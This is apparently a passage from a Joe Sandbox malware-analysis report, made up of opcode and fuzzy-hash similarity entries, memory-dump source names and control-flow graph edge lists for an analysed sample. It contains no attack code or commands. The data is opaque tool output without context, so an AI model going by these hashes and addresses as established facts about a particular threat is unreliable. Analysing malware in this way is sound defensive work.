                                                                                                                            • Opcode ID: 76a672c4475464d29879f9cae2e319fd7c763e2e05bb565449c4caf37caa82b4
                                                                                                                            • Instruction ID: e89ba62ac88675492cbea194716591f5c5bc8c9d7062b1b5cc3f034e2001040a
                                                                                                                            • Opcode Fuzzy Hash: 76a672c4475464d29879f9cae2e319fd7c763e2e05bb565449c4caf37caa82b4
                                                                                                                            • Instruction Fuzzy Hash: BD72CF74E01229CFDB64DF69C894BD9BBB2BB4A300F1095EAD409A7355DB349E81CF90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 89d0e095eefb3f1b0011e61c1413222a45d5dd0865e0e73471160fe054206eb9
                                                                                                                            • Instruction ID: bc3d6d26e1fb3b7f09d217ff7b0bf94fa7f23a29ecdb6710a8a8006d80595bd1
                                                                                                                            • Opcode Fuzzy Hash: 89d0e095eefb3f1b0011e61c1413222a45d5dd0865e0e73471160fe054206eb9
                                                                                                                            • Instruction Fuzzy Hash: 3FE1D274E01218CFEB64DFA5C944B9DBBB2BF89304F2081AAD809B7395DB355A85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 382e0f8ea9b72931a35a27e52ca577a1b2e22438368eaa8a0121df0a560816a4
                                                                                                                            • Instruction ID: a71d3ea1e1731495ac5e1263821c01309941b940ec0e831b63d349ae1502f78b
                                                                                                                            • Opcode Fuzzy Hash: 382e0f8ea9b72931a35a27e52ca577a1b2e22438368eaa8a0121df0a560816a4
                                                                                                                            • Instruction Fuzzy Hash: 71A1B270E012288FEB68CF6AC944B9DFBF2AF89300F14D0AAD40DA7255DB305A85CF55
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8fe4a052ed6c856a17e01bfa2971f9231cdd17f9c44e1f9470cf0c7ed448e1bb
                                                                                                                            • Instruction ID: f5fb0a52e323b869cb75fca168742ca9e50c39cdd56fce3bbd8f7250073a0297
                                                                                                                            • Opcode Fuzzy Hash: 8fe4a052ed6c856a17e01bfa2971f9231cdd17f9c44e1f9470cf0c7ed448e1bb
                                                                                                                            • Instruction Fuzzy Hash: 1EA19274E012288FEB58CF6AD944B9DFBF2AF89300F14D0AAD40DA7255DB345A85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9b11c6931b26d6b461f9f545cff4a45bd0703b97f4ff8cb6d1318391d8d24a9d
                                                                                                                            • Instruction ID: 86c5b4ce9ab1d199ce844a58e892a78a91db5640114faff1f59f609d5d0e4e5b
                                                                                                                            • Opcode Fuzzy Hash: 9b11c6931b26d6b461f9f545cff4a45bd0703b97f4ff8cb6d1318391d8d24a9d
                                                                                                                            • Instruction Fuzzy Hash: D9A1A3B4E012188FEB68CF6AC944B9DFBF2AF89304F14D0AAD40DA7255DB345A85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0366990d8a80bcd5293084ec13c8c42501bae3298cc88f33ece10430a5dba468
                                                                                                                            • Instruction ID: f466d55375be5c01f0839b2f9e9406e2d25e26f9f04c8691b71d97a6090021b1
                                                                                                                            • Opcode Fuzzy Hash: 0366990d8a80bcd5293084ec13c8c42501bae3298cc88f33ece10430a5dba468
                                                                                                                            • Instruction Fuzzy Hash: 77A1A374E012188FEB68CF6AC944B9DBBF2AF89300F14C1AAD80DA7255DB345A85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 093f58b24d49be65a450e9bf9a3c69cf5dd0d98cb2c78d0f9a795614f0095d6f
                                                                                                                            • Instruction ID: 5c38da877ddca69c9e9e426574135b0c7c73262f59ec43cecabef52d71ee9a12
                                                                                                                            • Opcode Fuzzy Hash: 093f58b24d49be65a450e9bf9a3c69cf5dd0d98cb2c78d0f9a795614f0095d6f
                                                                                                                            • Instruction Fuzzy Hash: 2DA1B274E012188FEB68CF6AD944B9DFBF2BF89300F14D0AAD809A7255DB345A85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f1145ba6e46b1fa675932c0081ccf03df43ac71c4247221a5ddc763540d0fda9
                                                                                                                            • Instruction ID: a916d06ca4fe57277b399f39794c21e046626219e822ccbacddd72decb076b5d
                                                                                                                            • Opcode Fuzzy Hash: f1145ba6e46b1fa675932c0081ccf03df43ac71c4247221a5ddc763540d0fda9
                                                                                                                            • Instruction Fuzzy Hash: 31A1B374E012188FEB68CF6AD944B9DFBF2AF89304F14D0AAD40DA7255DB345A85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 670174422b5c61ac7ba9d3de05202746b07cf79883afeec7137dfc78367df23f
                                                                                                                            • Instruction ID: 0fa7bb60c8cec53b273b7a1974351abd60f854436b166b083581530ea58fc607
                                                                                                                            • Opcode Fuzzy Hash: 670174422b5c61ac7ba9d3de05202746b07cf79883afeec7137dfc78367df23f
                                                                                                                            • Instruction Fuzzy Hash: 54A1A474E012188FEB58CF6AC944B9DFBF2AF89300F14C1AAD90DA7255DB345A85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 79d7e6120f173c726dedcee67e29b5d9d7db464768b8188d55ad11811eac9553
                                                                                                                            • Instruction ID: b79431f19c7ba114e918eda56c26665055e7028e70ef1e196e9882bab2d72afc
                                                                                                                            • Opcode Fuzzy Hash: 79d7e6120f173c726dedcee67e29b5d9d7db464768b8188d55ad11811eac9553
                                                                                                                            • Instruction Fuzzy Hash: 8FA19374E012188FEB68CF6AD944B9DFBF2AF89300F14C0AAD80CA7255DB345A85CF55
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ace1fc96530d289d888fcb97a1c87f3474035db91a3e72f615ba33d7f5aab6b0
                                                                                                                            • Instruction ID: b94aad882675600bb15d2bd0c3ef20074b932c9954870f5149087a8091399c6d
                                                                                                                            • Opcode Fuzzy Hash: ace1fc96530d289d888fcb97a1c87f3474035db91a3e72f615ba33d7f5aab6b0
                                                                                                                            • Instruction Fuzzy Hash: 12A19274E012188FEB68CF6AC944B9DFBF2AF89300F14C1AAD80DA7255DB345A85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5c5e8065645bd36e6cb86b2ad31243fdc3b9ffb7fbf3aa552240838c17de638c
                                                                                                                            • Instruction ID: 1b13d4db14fe4fca4c2ef57a9abfee1b64ee2b606563381a63fd60610651c9e8
                                                                                                                            • Opcode Fuzzy Hash: 5c5e8065645bd36e6cb86b2ad31243fdc3b9ffb7fbf3aa552240838c17de638c
                                                                                                                            • Instruction Fuzzy Hash: 8E819474E412289FDBA4DF69D881BDDBBB2BF89301F1081EAD848A7254DB315E81CF40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e5526c829d4e5eeecab96a74f4840d768a4eb2a77ec1e1d456f1efb6fe9b3a9
                                                                                                                            • Instruction ID: 685ff9bf028ed936c1c4d72ff321bf022b72da1d7082d42894ab8991db835084
                                                                                                                            • Opcode Fuzzy Hash: 5e5526c829d4e5eeecab96a74f4840d768a4eb2a77ec1e1d456f1efb6fe9b3a9
                                                                                                                            • Instruction Fuzzy Hash: 9081A670E006188FEB68CF6AC954B9EFBF2AF89300F14C1AAD50DA7255DB305A85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0585381cb9fddfe4b6df5858c5cd4746f00a2e375799637d2c4872c45c87e185
                                                                                                                            • Instruction ID: 25524ceec4368a5f9e8800eb8a750b9693632b88df939f80f7ca64b14e044c7e
                                                                                                                            • Opcode Fuzzy Hash: 0585381cb9fddfe4b6df5858c5cd4746f00a2e375799637d2c4872c45c87e185
                                                                                                                            • Instruction Fuzzy Hash: 4871C375D01228CFDB68DF66C984BDDBBB2AF89301F1085AAD408A7254DB355E86CF40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8e708d39a4726a34a5b79a133e76aa139bb080d41d90001a8de10ceecf5266d8
                                                                                                                            • Instruction ID: 16fca64246df070be57b77ca14e94e10a78f481d7760a4c8c7c56a63cd025236
                                                                                                                            • Opcode Fuzzy Hash: 8e708d39a4726a34a5b79a133e76aa139bb080d41d90001a8de10ceecf5266d8
                                                                                                                            • Instruction Fuzzy Hash: 24718571E016188FEB68CF6AC944B9EFBF2AF89300F14C0AAD50DA7255DB345A85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6931e38eae90cc307e2588b706e1608e85ebeda412a10b8b5e208c6d1017dd23
                                                                                                                            • Instruction ID: 705b01f0383fd3b32a261cdb516f9a47da6fe682c4eb0bff6ba3d9c5cad7224e
                                                                                                                            • Opcode Fuzzy Hash: 6931e38eae90cc307e2588b706e1608e85ebeda412a10b8b5e208c6d1017dd23
                                                                                                                            • Instruction Fuzzy Hash: EA718671E006188FEB68CF6AC944B9EFBF2AF89300F14C1AAD50DA7255DB345A85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1447505de2f413305059766d3c3f19fb6a0fcd7634f4b8e08502921145bfe7f6
                                                                                                                            • Instruction ID: dd78520b6eb030ee029e300236b04078a118ee6870f28763a658d357aff31025
                                                                                                                            • Opcode Fuzzy Hash: 1447505de2f413305059766d3c3f19fb6a0fcd7634f4b8e08502921145bfe7f6
                                                                                                                            • Instruction Fuzzy Hash: 364179B1D016189BEB58CF6BCD457CAFAF3AFC9204F04C0AAD50CA6255DB740A868F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9ffd4d918205001549329c44699978c134a68dd3fb541ef380ee56f3dec230f1
                                                                                                                            • Instruction ID: e2994b17ceab749b8f7aa6a7d5f774b67c1f056bb6325c27ec31605312251e1e
                                                                                                                            • Opcode Fuzzy Hash: 9ffd4d918205001549329c44699978c134a68dd3fb541ef380ee56f3dec230f1
                                                                                                                            • Instruction Fuzzy Hash: DF417871E016189BEB58CF6BDD447DAFAF3AFC9214F04C1AAC50CA6264DB740A868F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: da4292708722f6fb2989b024edc575053a469e8bc6502048e1fda92569f3e312
                                                                                                                            • Instruction ID: 4fd71bf2599e2868579e78541b56942f5a34c93383534d72bb6e9b162d90739e
                                                                                                                            • Opcode Fuzzy Hash: da4292708722f6fb2989b024edc575053a469e8bc6502048e1fda92569f3e312
                                                                                                                            • Instruction Fuzzy Hash: 2341D3B0D002188BEB58DFAAC8447DDFBF2AF89300F10D16AD418BB254DB755946CF94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4a8e3f88a171fda4ed42fc33c423bc1f10c06edb8a9c6cad502df5cf18d806d3
                                                                                                                            • Instruction ID: d8e71c5c3b7b472d5332942068cac319d8c7debe70888e9c09af24be05a7729a
                                                                                                                            • Opcode Fuzzy Hash: 4a8e3f88a171fda4ed42fc33c423bc1f10c06edb8a9c6cad502df5cf18d806d3
                                                                                                                            • Instruction Fuzzy Hash: 904187B1E016188FEB58CF6BD9457CAFAF3AFC8300F14C1AAC50CA6254DB741A858F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ec9c5452e6af8119507fa44d596e52537bbb891fd5ef40a3fb136a4aae71d78f
                                                                                                                            • Instruction ID: 656765046b65ce381d53b2c2ef0616fc189324fac6a3ea9bf4b91d4822cb12ba
                                                                                                                            • Opcode Fuzzy Hash: ec9c5452e6af8119507fa44d596e52537bbb891fd5ef40a3fb136a4aae71d78f
                                                                                                                            • Instruction Fuzzy Hash: D6416A71E016188BEB58CF6BD9457CAFAF3AFC9304F14D1AAC50CA6254DB740A868F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dbe76794fb7498d96b2ee9262ddfe9ad9e114a7c514f5e24a635321f421fbef0
                                                                                                                            • Instruction ID: 10a1e2eb5e83091ae0af13bd2df8fecb375ec6e5262e28a8e027f13aa3f97ce0
                                                                                                                            • Opcode Fuzzy Hash: dbe76794fb7498d96b2ee9262ddfe9ad9e114a7c514f5e24a635321f421fbef0
                                                                                                                            • Instruction Fuzzy Hash: 59414AB1D016189BEB58CF6BDD457CAFAF3AFC9300F14C1AAD50CA6264DB740A858F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ecb0ec170590392d4dd609a3cec142889930ae24322008b91267c586c291b759
                                                                                                                            • Instruction ID: 30522a39ca03e818f8493ff48452dad83cd5d4d2b9fb263a099b969bed5e8127
                                                                                                                            • Opcode Fuzzy Hash: ecb0ec170590392d4dd609a3cec142889930ae24322008b91267c586c291b759
                                                                                                                            • Instruction Fuzzy Hash: 4D416971E016188BEB58CF6BC9447CAFAF3AFC9314F14C1AAD50CA6264DB740A868F51

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 9a6e68-9a6e8d 1 9a72bc-9a72c0 0->1 2 9a6e93-9a6eb6 0->2 3 9a72d9-9a72e7 1->3 4 9a72c2-9a72d6 1->4 11 9a6ebc-9a6ec9 2->11 12 9a6f64-9a6f68 2->12 8 9a7358-9a736d 3->8 9 9a72e9-9a72fe 3->9 20 9a736f-9a7372 8->20 21 9a7374-9a7381 8->21 22 9a7300-9a7303 9->22 23 9a7305-9a7312 9->23 26 9a6ecb-9a6ed6 11->26 27 9a6ed8 11->27 13 9a6f6a-9a6f78 12->13 14 9a6fb0-9a6fb9 12->14 13->14 36 9a6f7a-9a6f95 13->36 18 9a73cf 14->18 19 9a6fbf-9a6fc9 14->19 30 9a73d4-9a7404 18->30 19->1 28 9a6fcf-9a6fd8 19->28 24 9a7383-9a73be 20->24 21->24 25 9a7314-9a7355 22->25 23->25 76 9a73c5-9a73cc 24->76 33 9a6eda-9a6edc 26->33 27->33 34 9a6fda-9a6fdf 28->34 35 9a6fe7-9a6ff3 28->35 51 9a741d-9a7424 30->51 52 9a7406-9a741c 30->52 33->12 40 9a6ee2-9a6f44 33->40 34->35 35->30 41 9a6ff9-9a6fff 35->41 55 9a6fa3 36->55 56 9a6f97-9a6fa1 36->56 86 9a6f4a-9a6f61 40->86 87 9a6f46 40->87 43 9a72a6-9a72aa 41->43 44 9a7005-9a7015 41->44 43->18 50 9a72b0-9a72b6 43->50 60 9a7029-9a702b 44->60 61 9a7017-9a7027 44->61 50->1 50->28 64 9a6fa5-9a6fa7 55->64 56->64 63 9a702e-9a7034 60->63 61->63 63->43 67 9a703a-9a7049 63->67 64->14 68 9a6fa9 64->68 72 9a704f 67->72 73 9a70f7-9a7122 call 9a6ca0 * 2 67->73 68->14 75 9a7052-9a7063 72->75 90 9a7128-9a712c 73->90 91 9a720c-9a7226 73->91 75->30 79 9a7069-9a707b 75->79 79->30 82 9a7081-9a7099 79->82 144 9a709b call 9a7438 82->144 145 9a709b call 9a7428 82->145 85 9a70a1-9a70b1 85->43 89 9a70b7-9a70ba 85->89 86->12 87->86 92 9a70bc-9a70c2 89->92 93 9a70c4-9a70c7 89->93 90->43 95 9a7132-9a7136 90->95 91->1 113 9a722c-9a7230 91->113 92->93 96 9a70cd-9a70d0 92->96 93->18 93->96 98 9a7138-9a7145 95->98 99 9a715e-9a7164 95->99 100 9a70d8-9a70db 96->100 101 9a70d2-9a70d6 96->101 116 9a7147-9a7152 98->116 117 9a7154 98->117 103 9a719f-9a71a5 99->103 104 9a7166-9a716a 99->104 100->18 102 9a70e1-9a70e5 100->102 101->100 101->102 102->18 105 9a70eb-9a70f1 102->105 107 9a71b1-9a71b7 103->107 108 9a71a7-9a71ab 103->108 104->103 106 9a716c-9a7175 104->106 105->73 105->75 111 9a7177-9a717c 106->111 112 9a7184-9a719a 106->112 114 9a71b9-9a71bd 107->114 115 9a71c3-9a71c5 107->115 108->76 108->107 111->112 112->43 119 9a726c-9a7270 113->119 120 9a7232-9a723c call 9a5b50 113->120 114->43 114->115 121 9a71fa-9a71fc 115->121 122 9a71c7-9a71d0 115->122 118 9a7156-9a7158 116->118 117->118 118->43 118->99 119->76 126 9a7276-9a727a 119->126 120->119 133 9a723e-9a7253 120->133 121->43 124 9a7202-9a7209 121->124 128 9a71df-9a71f5 122->128 129 9a71d2-9a71d7 122->129 126->76 130 9a7280-9a728d 126->130 128->43 129->128 136 9a728f-9a729a 130->136 137 9a729c 130->137 133->119 141 9a7255-9a726a 133->141 138 9a729e-9a72a0 136->138 137->138 138->43 138->76 141->1 141->119 144->85 145->85
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                            • API String ID: 0-1932283790
                                                                                                                            • Opcode ID: 2cb53b827a7cffad139a0e1c2d50273d78841a2a2da333566f0d0a95a4eb843a
                                                                                                                            • Instruction ID: 78e358ba461aca2fe113586563f86a641a0e7c0ca2232ca63bad1d275e08bf6d
                                                                                                                            • Opcode Fuzzy Hash: 2cb53b827a7cffad139a0e1c2d50273d78841a2a2da333566f0d0a95a4eb843a
                                                                                                                            • Instruction Fuzzy Hash: 25126B30A042099FCB14CFA9D984A9EBBF6FF89314F158569E819DB361DB30ED41CB90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 399 9a21e8-9a221c 401 9a221e-9a2225 399->401 402 9a2237-9a223f 399->402 403 9a222e-9a2235 401->403 404 9a2227-9a222c 401->404 405 9a2242-9a2256 402->405 403->405 404->405 408 9a2258-9a225f 405->408 409 9a226c-9a2274 405->409 410 9a2261-9a2263 408->410 411 9a2265-9a226a 408->411 412 9a2276-9a227a 409->412 410->412 411->412 414 9a22da-9a22dd 412->414 415 9a227c-9a2291 412->415 416 9a22df-9a22f4 414->416 417 9a2325-9a232b 414->417 415->414 422 9a2293-9a2296 415->422 416->417 424 9a22f6-9a22fa 416->424 419 9a2331-9a2333 417->419 420 9a2e26 417->420 419->420 423 9a2339-9a233e 419->423 427 9a2e2b-9a3441 420->427 425 9a2298-9a229a 422->425 426 9a22b5-9a22d3 call 9a02c8 422->426 428 9a2dd4-9a2dd8 423->428 429 9a2344 423->429 430 9a22fc-9a2300 424->430 431 9a2302-9a2320 call 9a02c8 424->431 425->426 432 9a229c-9a229f 425->432 426->414 544 9a3452-9a345a 427->544 545 9a3443-9a3445 427->545 434 9a2dda-9a2ddd 428->434 435 9a2ddf-9a2e25 428->435 429->428 430->417 430->431 431->417 432->414 437 9a22a1-9a22b3 432->437 434->427 434->435 437->414 437->426 548 9a345c-9a346a 544->548 546 9a344b-9a3450 545->546 547 9a3447-9a3449 545->547 546->548 547->548 551 9a346c-9a346e 548->551 552 9a3480-9a3488 548->552 553 9a3470-9a3475 551->553 554 9a3477-9a347e 551->554 555 9a348b-9a348e 552->555 553->555 554->555 557 9a3490-9a349e 555->557 558 9a34a5-9a34a9 555->558 557->558 564 9a34a0 557->564 559 9a34ab-9a34b9 558->559 560 9a34c2-9a34c5 558->560 559->560 569 9a34bb 559->569 562 9a34cd-9a3502 560->562 563 9a34c7-9a34cb 560->563 571 9a3564-9a3569 562->571 563->562 566 9a3504-9a351b 563->566 564->558 567 9a351d-9a351f 566->567 568 9a3521-9a352d 566->568 567->571 572 9a352f-9a3535 568->572 573 9a3537-9a3541 568->573 569->560 574 9a3549 572->574 573->574 575 9a3543 573->575 577 9a3551-9a355d 574->577 575->574 577->571
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
                                                                                                                            • API String ID: 0-1317942629
                                                                                                                            • Opcode ID: 49819cd110e1e7febd60fa59f839d011d608c881a8c97ef98abdd4578cc5de91
                                                                                                                            • Instruction ID: 5d8a6963cd9c174affdacef3b2d71dacce8272e9be336f93de62d1baf81907b3
                                                                                                                            • Opcode Fuzzy Hash: 49819cd110e1e7febd60fa59f839d011d608c881a8c97ef98abdd4578cc5de91
                                                                                                                            • Instruction Fuzzy Hash: 88229C6D844251C6D7105BF95D9821EBEB8FFCB350B59C9CAD850632D1CE2DA683C3E2

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
